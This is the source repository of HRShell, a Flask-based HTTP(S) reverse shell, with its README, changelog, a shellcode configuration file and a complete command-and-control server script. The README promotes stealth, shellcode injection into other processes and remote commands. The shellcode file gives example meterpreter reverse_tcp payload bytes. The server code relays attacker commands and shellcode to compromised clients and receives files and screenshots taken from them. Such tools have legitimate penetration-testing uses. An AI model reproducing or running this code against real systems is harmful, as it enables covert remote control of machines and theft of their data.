README.md
<div align="center">
<img src="images/0.png">

##### HRShell: An advanced HTTP(S) Reverse Shell built with Flask
[![GPLv3 license](https://img.shields.io/badge/license-GPLv3-blue.svg?style=flat-square)](https://github.com/chrispetrou/HRShell/blob/master/LICENSE) 
[![](https://img.shields.io/badge/python-3-yellow.svg?style=flat-square&logo=python&logoColor=white)](https://www.python.org/)
[![](https://img.shields.io/badge/Build%20with-Flask-blueviolet.svg?style=flat-square&logo=flask&logoColor=white)](https://palletsprojects.com/p/flask/)
[![version](https://img.shields.io/badge/version-1.7-lightgray.svg?style=flat-square)](https://github.com/chrispetrou/HRShell/blob/master/CHANGELOG.md) 
[![Known Vulnerabilities](https://snyk.io//test/github/chrispetrou/HRShell/badge.svg?style=flat-square&targetFile=requirements.txt)](https://snyk.io//test/github/chrispetrou/HRShell?targetFile=requirements.txt)

* * *

<img src="images/preview.svg" width="80%">
</div>
<br>

__HRShell__ is an HTTPS/HTTP reverse shell built with flask and is compatible with __python 3.x__. The `client.py` has been successfully tested on:
*   ![](https://img.shields.io/badge/-white.svg??style=for-the-badge&logo=linux&linux&logoColor=black) Linux ubuntu 18.04 LTS, Kali Linux 2019.3
*   ![](https://img.shields.io/badge/-white.svg??style=for-the-badge&logo=apple&windows&logoColor=black) macOS Mojave
*   ![](https://img.shields.io/badge/-white.svg??style=for-the-badge&logo=windows&windows&logoColor=black) Windows 7/10

while the `server.py` is compatible with Unix systems (_Windows support comming soon..._)

### Features

*   It's stealthy
*   __TLS__ support 🔑
    -   Either using _on-the-fly_ certificates or
    -   By specifying a cert/key pair (_more details below..._)
*   Shellcode injection 💉 (_more details below..._)
    -   Either shellcode injection in a thread/spawned-process of the current running process
        *   Platforms supported so far: 
            *   __Windows x86__   
            *   __Unix x86__
            *   __Unix x64__
    -   or shellcode injection into another process (`migrate <PID>`) by specifying its PID
        *   Platforms supported so far: 
            *   __Windows x86__
            *   __Windows x64__
*   Shellcode can be set/modified on the fly from the server (_more details below..._)   
*   Proxy support on client.
*   Directory navigation (`cd` command and variants).
*   Interactive `history` command available on Unix systems.
*   `download/upload/screenshot/hex` commands available.
*   Pipelining (`|`) & chained commands (`;`) are supported
*   Support for every non-interactive (_like gdb, top etc..._) command
*   Server is both HTTP & HTTPS capable.
*   It comes with two built-in servers 🌐 so far... _flask built-in_ & _tornado-WSGI_ while it's also compatible with other production servers like [`gunicorn`](http://gunicorn.org/) and [`Nginx`](https://www.nginx.com/).
*   Both `server.py` and `client.py` are easily extensible.
*   Since the most functionality comes from server's endpoint-design it's very easy to write a client in any other language _e.g. java, GO etc..._

<sub>*For version changes check-out [CHANGELOG](https://github.com/chrispetrou/HRShell/blob/master/CHANGELOG.md).</sub>

### Details
* * *

### Stealthy :squirrel:
HRShell is stealthy since it uses the HTTP(S) protocol as the communication method between client and server. In addition when TLS is in use the traffic is also encrypted. Also if the CERT is not hand coded on client-side (_which is a feasible option_) and the `upload` command is not used, then `client.py` doesn't touches the disk at all.

### TLS 🔑

__Server-side:__
Unless `--http` option is specified, by default `server.py` is HTTPS using _on-the-fly_ certificates, since on-the-fly certificates are a built-in flask-feature. But if `-s tornado` option is specified in order to make the server use TLS, a `--cert` and a `--key` option must be specified like so:

```
python server.py -s tornado --cert /path/cert.pem --key /path/key.pem
```

Either "real" certificates can be used or another way to generate a cert/key pair is e.g. either using [mkcert](https://github.com/FiloSottile/mkcert) or [openssl](https://www.openssl.org/) directly like so:

```
openssl req -x509 -newkey rsa:4096 -nodes -out cert.pem -keyout key.pem -days 365
```

A cert/key pair can also be used with the flask-server:
```
python server.py --cert /path/cert.pem --key /path/key.pem
```

> ⚠️ If the server is using TLS, then by design the client can't use `http://...` to connect to the server, but must explicitly use `https` instead.

__Client-side:__
By default client's SSL _verification_ is disabled, unless:
*   either the `--cert` parameter is specified e.g.:
    ```
    python client.py -s https://192.168.10.7:5000 --cert /path/cert.pem
    ```
*   or the `CERT` variable, instead of the default `None` value is set beforehand with a valid certificate e.g.:
    ```python
    CERT = """
    -----BEGIN CERTIFICATE-----
    MIIBoDCCAUoCAQAwDQYJKoZIhvcNAQEEBQAwYzELMAkGA1UEBhMCQVUxEzARBgNV
    BAgTClF1ZWVuc2xhbmQxGjAYBgNVBAoTEUNyeXB0U29mdCBQdHkgTHRkMSMwIQYD
    VQQDExpTZXJ2ZXIgdGVzdCBjZXJ0ICg1MTIgYml0KTAeFw05NzA5MDkwMzQxMjZa
    ...
    -----END CERTIFICATE-----
    """
    ```
    In this case _client.py_ will attempt to create a hidden _.cert.pem_ file on the fly and will use that instead.

> ⚠️ That the SSL verification is disabled by default on client **doesn't** mean in any case that the TLS is disabled too, **TLS will be enabled** if the server uses it - so **TLS depends completely on the server**. The `--cert` option _on client_ is there just as an alternative way for the server-client to have an encrypted session and that's all. 

### Shellcode injection 💉

There are two "modes" of shellcode injection using the two following commands respectively:

1. `migrate <PID>`: Using this command we can inject shellcode into the memory space of another process by specifying its PID. For now this command can only be applied at __Windows x86/x64__ platforms!

<img src="images/1.png">

2. `inject shellcode`: Using this command a new thread (_or spawned process on unix systems_) of our current process is created and the shellcode injection occurs in its memory space. As a result our HTTP(S) shell is not affected by the injection. The platforms where this command can be applied are: __Unix x86/x64, Windows x86__ platforms!

<img src="images/2.png">

##### Notes

*   In case the injection happens on a process, then process-permissions play a very important role. It's not always possible to inject on any process due to lack of appropriate privileges.

### Set/Modify shellcode

There are two ways you can specify/set what type of shellcode you want the client to execute:

*   Either pre-set `shellcode` variable on `client.py` script to be a valid shellcode or
*   Use the `set shellcode <shellcode-id>` command to do that on the fly. With this command you can update your shellcode on client-side from server-side as many times as you like!

<img src="images/3.png" width="60%">

The first way is pretty straight forward. However in order to use the second and more convenient way (_since you can also modify an already specified shellcode_) you have to set `shellcodes/utils.py` script such that it contains the shellcode(s) of your choise. The script contains an example of how you can do that.

> 💡 You can modify/update `shellcodes/utils.py` script even after you've launched `server.py` as many times as you want, since `server.py` will dynamically use the most updated/recent version. In this way you can set & modify shellcodes on the go...

### Available commands:

Special commands:

<img src="images/4.png" width="70%">

Any other command is supported if it's __not__ interactive like _e.g. gdb, top etc..._ Also by typing `python server.py -h` or `python client.py -h` you can get information the server and client available arguments.

__Note:__ If a client is connected with the server and we want to terminate the server, before press <kbd>CTRL</kbd>+<kbd>C</kbd>, we have to close the connection using the `exit` command.

### Creating custom commands
__Client-side:__

In order to create a _custom_ command, generally:
*   a regex rule that describes the command must be defined on client-side
*   the code to handle that command must be added as an `elif` statement also on client-side.

__Server-side:__

If the command demands the existence of a new-endpoint on server-side, then:
*   to define the endpoint:
    ```python
    @app.route('/custom_endpoint/<arg>')
    def custom_endpoint(arg):
        """
        documentation if needed
        """
        ...
        return ...
    ```
*   then edit `handleGET()` to redirect the client to that endpoint:
    ```python
    @app.route('/')
    def handleGET():
        ...
        return redirect(url_for('custom_endpoint',
            arg=...)
            )
    ```
*   do the appropriate edits in `handlePOST()` to handle the presentation of the results.

#### Script-Arguments

Both scripts (_server.py_ and _client.py_) can be customized through arguments:

__server.py__
```
$ python server.py -h
usage: server.py [-h] [-s] [-c] [--host] [-p] [--http] [--cert] [--key]

server.py: An HTTP(S) reverse-shell server with advanced features.

arguments:
  -h, --help      show this help message and exit
  -s , --server   Specify the HTTP(S) server to use (default: flask).
  -c , --client   Accept connections only from the specified client/IP.
  --host          Specify the IP to use (default: 0.0.0.0).
  -p , --port     Specify a port to use (default: 5000).
  --http          Disable TLS and use HTTP instead.
  --cert          Specify a certificate to use (default: None).
  --key           Specify the corresponding private key to use (default: None).
```
__client.py__
```
$ python client.py -h
usage: client.py [-h] [-s] [-c] [-p]

client.py: An HTTP(S) client with advanced features.

arguments:
  -h, --help      show this help message and exit
  -s , --server   Specify an HTTP(S) server to connect to.
  -c , --cert     Specify a certificate to use.
  -p , --proxy    Specify a proxy to use [form: host:port]
```

### 📦 Requirements:

To install the server-requirements:

```
pip install -r requirements.txt --upgrade --user
```

#### TODO
- [ ] Add more commands and features.
- [ ] Fix potential bugs.

#### :thought_balloon: Contributions & Feedback

Feedback and contributions are welcome. If you find any bug or have a feature request feel free to open an issue, and as soon as I review it I'll try to fix it.

### Disclaimer
>This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software in general.

### Credits & References

*   Seitz J. Gray Hat Python: Python programming for hackers and reverse engineers. no starch press; 2009 Apr 15.
*   [PyShellCode](https://github.com/thomaskeck/PyShellCode)
*   A great article found [here](http://www.debasish.in/2012/04/execute-shellcode-using-python.html).
*   Client's `hexdump` function taken from [this great gist](https://gist.github.com/7h3rAm/5603718).
*   The HRShell logo is made with [fontmeme.com](https://fontmeme.com/graffiti-fonts/)!

### License

This project is licensed under the GPLv3 License - see the [LICENSE](LICENSE) file for details.

CHANGELOG.md
#### Version 1.8 (_TBA_)

*   More features & bug fixes!

#### Version 1.7 (_11-10-2019_)

*   Implemented interactive `history` command available when `server.py` runs on Unix systems.
*   Also on __unix__ systems, the `inject shellcode` command, instead of spawning a new thread will spawn a new process. In this way even if e.g. the meterpreter session closes the HTTP(S) connection remains intact. On windows systems there was no such problem...
*   `hex <(path to) file>` command added!
*   Comments are supported... 

#### Version 1.6 (_09-10-2019_)

*   `screenshot` command __doesn't__ store the screenshot captured on the client and then trasmits it to server, __but__ directly transmits it to the server avoiding to touch the disk on client.
*   Direct browser connections are not allowed.
*   `help` command added.

#### Version 1.5 (_28-09-2019_)

*   Now shellcode can be set or modified on the fly from the server using the `set shellcode <id>` command.

#### Version 1.4 (_22-09-2019_)

*   `migrate <PID>` command now works for both x86 and x64 Windows systems!

#### Version 1.3 (_22-09-2019_)

*   Shellcode injection into the current process now works for more platforms. The platforms supported are:
    *   __Unix x86__
    *   __Unix x64__
    *   __Windows x86__   
Also now instead of injecting directly into the current process the shellcode injection takes place into the memory space of a current's process thread. As a result the HTTP(S) shell does not gets affected in any wat by the shellcode injection!

#### Version 1.2 (_20-09-2019_)

*   Python 2.x compatibility removed since there were some bugs regarding some present and future features.

#### Version 1.1 (_20-08-2019_)

*   It's stealthy
*   __TLS__ support 🔑
    -   Either using _on-the-fly_ certificates or
    -   By specifying a cert/key pair (_more details below..._)
*   Proxy 🦊 support on client.
*   Directory navigation (`cd` command and variants).
*   `download/upload/screenshot` commands available.
*   shellcode injection 💉 (_for the time it is available only for windows x86 systems but support for other OSs and ARCHs will be added soon!_)
    -   Either shellcode injection into another process by specifying its PID
    -   or shellcode injection in the current running process
*   Pipelining (`|`) & chained commands (`;`) are supported
*   Support for every non-interactive (_like gdb, top etc..._) command
*   Server is both HTTP & HTTPS capable.
*   It comes with two built-in servers 🌐 so far... _flask built-in_ & _tornado-WSGI_ while it's also compatible with other production servers like [`gunicorn`](http://gunicorn.org/) and [`Nginx`](https://www.nginx.com/).
*   Both `server.py` and `client.py` are easily extensible.
*   Since the most functionality comes from server's endpoint-design it's very easy to write a client in any other language _e.g. java, GO etc..._

shellcodes/utils.py
#!/usr/bin/env python3

"""
Example:
--------
shellcode1 =  b""
shellcode1 += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
shellcode1 += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
shellcode1 += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
shellcode1 += b"\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0"
shellcode1 += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
...skip...
shellcode1 += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
shellcode1 += b"\xf0\xb5\xa2\x56\xff\xd5"

shellcode2 =  b""
shellcode2 += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64"
shellcode2 += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"
...skip...
shellcode2 += b"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c"
shellcode2 += b"\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff"
shellcode2 += b"\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56"
shellcode2 += b"\x6a\x00\x53\xff\xd5"

shellcodes = {
    1 : [
        "/windows/x64/meterpreter/reverse_tcp", shellcode1
    ],
    2 : [
        "/windows/x86/meterpreter/reverse_tcp", shellcode2
    ]
}
"""


shellcode1 = b""

shellcodes = {
    1 : [
        "", shellcode1
    ]
}

server.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

__Author__      = 'Christophoros Petrou (game0ver)'
__Project_url__ = 'https://github.com/chrispetrou/HRShell'
__License__     = 'GNU General Public License v3.0'
__Version__     = '1.7'

import os
import re
import io
import sys
import ssl
import time
import socket
import logging
from flask import (
    Flask,
    abort,
    request,
    url_for,
    jsonify,
    redirect,
    Blueprint
)
from PIL import Image
from random import randint
from binascii import hexlify
from tabulate import tabulate
from threading import Thread
from importlib import reload
from shellcodes import utils
from collections import deque
from flask_talisman import Talisman
from flask.logging import default_handler
from base64 import urlsafe_b64encode as benc
from argparse import (
    SUPPRESS,
    ArgumentParser,
    ArgumentTypeError,
    RawTextHelpFormatter
)
from colorama import (
    init,
    Fore,
    Back,
    Style
)
from tornado.ioloop import IOLoop
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
if os.name != 'nt':
    import inquirer
    from inquirer.themes import GreenPassion

# CONSOLE-COLORS
B, D, RA = Style.BRIGHT, Style.DIM, Style.RESET_ALL
BL, R, C, Y, G  = Fore.BLUE, Fore.RED, Fore.CYAN, Fore.YELLOW, Fore.GREEN

c1, c2, waiting = 0, 0, True
progress = {
    0 : ['▁', '▂', '▃', '▄', '▅', '▆', 
         '█', '▆', '▅', '▄', '▃', '▂'],
    1 : ['⚀', '⚁', '⚂', '⚃', '⚄', '⚅'],
    2 : ['|', '/', '-', '\\'],
    3 : ['◥', '◢', '◣', '◤'],
    4 : ['⊢', '⊤', '⊣', '⊥'],
    5 : ['⊔', '⊏', '⊓', '⊐'],
    6 : ['◎', '◉', '●'],
    7 : ['⨁', '⨂'],
    8 : ['❐', '❏']
}

log = logging.getLogger('werkzeug')
log.disabled = True

emptyresponse = ('', 204)
clientIP, chosen_shellcode = "", None
pastcmds, upload_contents, cmd_contents = deque(maxlen=10), "", ""

help_cmd        = re.compile(r'^\s*(help|\?)\s*$')
exit_cmd        = re.compile(r'^\s*exit\s*$')
clear_cmd       = re.compile(r'^\s*clear\s*$')
unix_path       = re.compile(r'^\s*download\s*((.+/)*([^/]+))$')
unix_upld       = re.compile(r'^\s*upload\s*(.+/)*([^/]+)$')
wind_path       = re.compile(r'^\s*download\s*((.+\\)*([^/]+))$')
wind_upld       = re.compile(r'^\s*upload\s*(.+\\)*([^/]+)$')
history_cmd     = re.compile(r'^\s*(history|h)\s*$')
set_shellcode   = re.compile(r'^\s*set\s*shellcode\s*(\d+)\s*$')
show_shellcodes = re.compile(r'^\s*show\s*shellcodes\s*$')

# available commands...
commands = [
    [f"{B}?/help{RA}", "Help menu"],
    [f"{B}h/history{RA}", "Interactive command-history"],
    [f"{B}screenshot{RA}", "Captures a client-screenshot"],
    [f"{B}upload <(path to) file>{RA}", "Uploads a file to the client"],
    [f"{B}download <(path to) file>{RA}", "Downloads a file from the client"],
    [f"{B}migrate <PID>{RA}", "Injects shellcode to a process with the specific PID"],
    [f"{B}inject shellcode{RA}", "Injects shellcode into a thread of the current process"],
    [f"{B}show shellcodes{RA}", "Shows all available to use shellcodes"],
    [f"{B}set shellcode <id>{RA}", "Sets shellcode to a custom shellcode specified by its id"],
    [f"{B}hex <(path to) file>{RA}", "Hex-dumps the file specified"],
    [f"{B}clear{RA}", "Clears the screen"],
    [f"{B}exit{RA}", "Closes the connection with the client"]
]

app = Flask(__name__)
app.config['SECRET_KEY'] = hexlify(os.urandom(16)) # you can change that to something permanent...
errors = Blueprint('errors', __name__)

def console():
    parser = ArgumentParser(description=f"{B}server.py:{RA} An HTTP(S) reverse-shell server with advanced features.", 
                formatter_class=RawTextHelpFormatter)
    parser._optionals.title = f"{B}arguments{RA}"
    parser.add_argument('-s', "--server",
                choices=['flask', 'tornado'],
                default='flask', metavar='',
                help=f"Specify the HTTP(S) server to use (default: {C}flask{RA}).")
    parser.add_argument('-c', "--client",
                type=validateIP,
                default=None, metavar='',
                help="Accept connections only from the specified client/IP.")
    parser.add_argument("--host",
                default='0.0.0.0', metavar='',
                help=f"Specify the IP to use (default: {C}0.0.0.0{RA}).")
    parser.add_argument('-p', "--port",
                type=validatePort,
                default=5000, metavar='',
                help=f"Specify a port to use (default: {C}5000{RA}).")
    parser.add_argument("--http",
                action="store_true",
                help="Disable TLS and use HTTP instead.")
    parser.add_argument("--cert",
                type=ValidateFile,
                metavar='',
                help=f'Specify a certificate to use (default: {C}None{RA}).')
    parser.add_argument("--key",
                type=ValidateFile,
                metavar='',
                help=f'Specify the corresponding private key to use (default: {C}None{RA}).')
    args = parser.parse_args()
    return args

def ret(t):
    sys.stdout.write("\033[F")
    sys.stdout.write("\033[K")
    time.sleep(t)

def custom_print(x):
    ret(.1)
    print(x)

def slowprint(s):
    if not s.endswith('\n'): s += "\n"
    for _ in s:
        sys.stdout.write(_)
        sys.stdout.flush()
        time.sleep(.01)

def rotate(progress):
    global c1, c2
    msg = list('waiting for a connection...')
    msg[c1] = msg[c1].capitalize()
    custom_print(f'{C+progress[c2]+RA} ' + ''.join(msg))
    c1 += 1
    c2 += 1
    if c1 == len(msg)-3: c1 = 0
    if c2 == len(progress): c2 = 0

def ValidateFile(file):
    if not os.path.isfile(file):
        raise ArgumentTypeError(f'{R+file+RA} does not exist')
    if os.access(file, os.R_OK):
        return file
    else:
        raise ArgumentTypeError(f'{R+file+RA} is not readable')

def validatePort(port):
    if isinstance(int(port), int):
        if 1 < int(port) < 65536:
            return int(port)
        else:
            raise ArgumentTypeError(f'{R}Port must be in range 1-65535{RA}')
    else:
        raise ArgumentTypeError(f'{R}Port must be in range 1-65535{RA}')

def validateIP(ip):
    try:
        if socket.inet_aton(ip):
            return ip
    except socket.error:
        raise ArgumentTypeError(f'{R}Invalid IP provided{RA}')

def craft_prompt(headers, ip):
    try:
        admin_usernames = ['root', 'Administrator', 'SYSTEM']
        username = headers.get('username')
        hostname = headers.get('hostname')
        cur_dir = headers.get('directory')
        if any(uname == username for uname in admin_usernames):
            return f"{B+R+username}-{hostname}@{ip+RA+B}:{BL+B}~{cur_dir+RA}# "
        else:
            return f"{B+R+username}-{hostname}@{ip+RA+B}:{BL+B}~{cur_dir+RA}$ "
    except TypeError:
        print(f"[{B}INFO{RA}] Probably a {B}browser{RA} connected from: {B+ip+RA}")
        abort(403)

@errors.app_errorhandler(Exception)
def handle_unexpected_error(error):
    status_code = 500
    response = {
        'error': {
            'type': 'UnexpectedException',
            'message': 'An unexpected error has occurred.'
        }
    }
    return jsonify(response), status_code

@app.errorhandler(500)
def internal_server_error(e):
    return redirect(url_for('handleGET'))

@app.errorhandler(403)
def error_403(e):
    return ("", 403)

@app.errorhandler(404)
def error_404(e):
    return redirect(url_for('handleGET'))

@app.before_request
def limit_remote_addr():
    if clientIP:
        if request.remote_addr != clientIP:
            abort(403)

def valid_file(file):
    """validate that the file exists and is readable"""
    if not os.path.isfile(file):
        app.logger.error(f'{file} does not exist!')
        return False
    if os.access(file, os.R_OK):
        return True
    else:
        app.logger.error(f'{file} is not readable')
        return False

@app.route('/')
def handleGET():
    global upload_contents, cmd_contents, waiting, pastcmds, chosen_shellcode
    try:
        if waiting == True:
            waiting = False
            time.sleep(.1)
            ret(.1)
        prompt = craft_prompt(request.headers, request.remote_addr)
        cmd = input(prompt)
        if cmd or not cmd.startswith('#'):
            pastcmds.append(cmd)
            if history_cmd.match(cmd) and pastcmds:
                pastcmds.pop()
                if os.name != 'nt':
                    q = [ inquirer.List('past_cmd',
                            message='Command history',
                            choices=pastcmds,
                            default=pastcmds[-1]),
                        ]
                    cmd = inquirer.prompt(q, theme=GreenPassion())['past_cmd']
                    pastcmds.append(cmd)
                else:
                    print(f"{B}ERROR:{RA} The history command currently doesn't work on Windows systems...")
                    return emptyresponse
            if unix_path.match(cmd):
                return redirect(url_for('download',
                    filepath=benc(unix_path.search(cmd).group(1).encode()))
                )
            elif unix_upld.match(cmd):
                filepath = cmd.split()[1]
                if valid_file(filepath):
                    file_name = unix_upld.search(cmd).group(2).encode()
                    with open(filepath, 'rb') as f:
                        upload_contents = benc(f.read())
                    return redirect(url_for('upload',
                        filename=file_name)
                    )
                else:
                    abort(404)
            elif wind_path.match(cmd):
                return redirect(url_for('download',
                    filepath=benc(wind_path.search(cmd).group(1).encode()))
                )
            elif wind_upld.match(cmd):
                filepath = cmd.split()[1]
                if valid_file(filepath):
                    file_name = wind_upld.search(cmd).group(2).encode()
                    with open(filepath, 'rb') as f:
                        upload_contents = benc(f.read())
                    return redirect(url_for('upload',
                        filename=file_name)
                    )
                else:
                    abort(404)
            elif clear_cmd.match(cmd):
                os.system('cls') if os.name == 'nt' else os.system('clear')
                return emptyresponse
            elif show_shellcodes.match(cmd):
                reload(utils)
                if utils.shellcodes[1][0]:
                    for k,v in utils.shellcodes.items():
                        if chosen_shellcode == k:
                            print(f"{B+str(k)+RA} => {G+v[0]+RA}")
                        else:
                            print(f"{B+str(k)+RA} => {v[0]}")
                else:
                    print(f"[{B}ERROR{RA}] There are no shellcodes available.")
                return emptyresponse
            elif set_shellcode.match(cmd):
                shc_id = int(set_shellcode.search(cmd).group(1))
                reload(utils)
                try:
                    if utils.shellcodes[shc_id][0]:
                        chosen_shellcode = shc_id
                        return redirect(url_for('setshellcode',
                            shc_id=shc_id)
                        )
                    else:
                        print(f"[x] There is no shellcode with id: {shc_id}")
                        return emptyresponse
                except KeyError:
                    print(f"[x] There is no shellcode with id: {shc_id}")
                    return emptyresponse
            elif help_cmd.match(cmd):
                print(tabulate(commands, 
                    headers=["Command","Description"])
                )
                return emptyresponse
            elif exit_cmd.match(cmd):
                cmd_contents = cmd
                waiting, chosen_shellcode = True, None
                startloading()
                return redirect(url_for('commander'))
            else:
                cmd_contents = cmd
                return redirect(url_for('commander'))
        else:
            return emptyresponse
    except EOFError:
        abort(404)


@app.route('/', methods=['POST'])
def handlePOST():
    if request.data:
        if request.headers.get('Filename'):
            filename = request.headers.get('Filename')
            if request.headers.get('Action') == 'download':
                with open(filename, 'wb') as w:
                    w.write(request.data)
                print(f'[{B+G}SUCCESS{RA}] {filename} successfully downloaded!')
            else:
                print(f'[{B+G}SUCCESS{RA}] {filename} successfully uploaded!')
        elif request.headers.get('Action') == 'screenshot':
            img = Image.open(io.BytesIO(request.data))
            screenshot_name = f"screenshot_{randint(0,1000)}.png"
            img.save(screenshot_name)
            print(f'[{B+G}SUCCESS{RA}] {screenshot_name} successfully downloaded!')
        elif request.headers.get('Shellcode_id'):
            slowprint(f"{B}[+]{RA} Shellcode successfully set to: {Y+utils.shellcodes[int(request.headers.get('Shellcode_id'))][0]}{RA}")
        else:
            print(request.data[:-1].decode())
    return emptyresponse


@app.route('/commander/')
def commander():
    return cmd_contents

@app.route('/setshellcode/<int:shc_id>')
def setshellcode(shc_id):
    """
    INFO: Sets shellcode on client-side to a custom shellcode
    <shc_id>: An integer specified by the user that corresponds to
              a custom shellcode from "shellcodes"-dictionary.
    """
    return utils.shellcodes[shc_id][1]

@app.route('/upload/<filename>')
def upload(filename):
    """
    INFO: Handles uploads from server.py --> client.py
    <filename>      : the name & extension of the file uploading in b64 encoding
    upload_contents : file-contents in base64 encoding as part of the page content
    """
    return upload_contents

@app.route('/download/<filepath>')
def download(filepath):
    """
    INFO: Handles downloads from client.py --> server.py
    <filepath>: is the base64 encoded (absolute path of the) file we want to download
    """
    return emptyresponse

@app.before_first_request
def stop_loading():
    global waiting
    waiting = False
    time.sleep(.1)
    ret(.1)

def loading():
    print('')
    prog = progress[randint(0, 8)]
    while waiting==True:
        rotate(prog)

def startloading():
    global c1, c2
    c1, c2 = 0, 0
    t = Thread(target=loading)
    t.daemon = True
    t.start()

if __name__ == '__main__':
    args = console()
    if args.client:
        clientIP = args.client
    try:
        if args.server=='flask':
            startloading()
            if args.http:
                app.run(host=args.host, port=args.port, debug=False)
            else:
                Talisman(app)
                if args.cert and args.key:
                    app.run(host=args.host, port=args.port, 
                        debug=False, ssl_context=(args.cert, args.key))
                else:
                    app.run(host=args.host, port=args.port, 
                        debug=False, ssl_context='adhoc')
        else:
            if args.http:
                slowprint(f"* Serving on: {B+BL}http://{args.host}:{args.port}{RA}")
                http_server = HTTPServer(WSGIContainer(app))
            elif args.cert and args.key:
                slowprint(f"* Serving on: {B+BL}https://{args.host}:{args.port}{RA}")
                Talisman(app)
                ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
                ssl_ctx.load_cert_chain(args.cert, args.key)
                http_server = HTTPServer(WSGIContainer(app), ssl_options=ssl_ctx)
            else:
                print(f"{B}ERROR:{RA} Both cert and key must be specified\nor disable TLS with --http option.")
                sys.exit(0)
            slowprint(f"* {B}Server:{RA} Tornado-WSGI")
            startloading()
            try:
                http_server.listen(args.port, address=args.host)
                IOLoop.instance().start()
            except KeyboardInterrupt:
                sys.exit(0)
    except socket.gaierror:
        print(f"{R}[x] Invalid host provided.{RA}")
        sys.exit(0)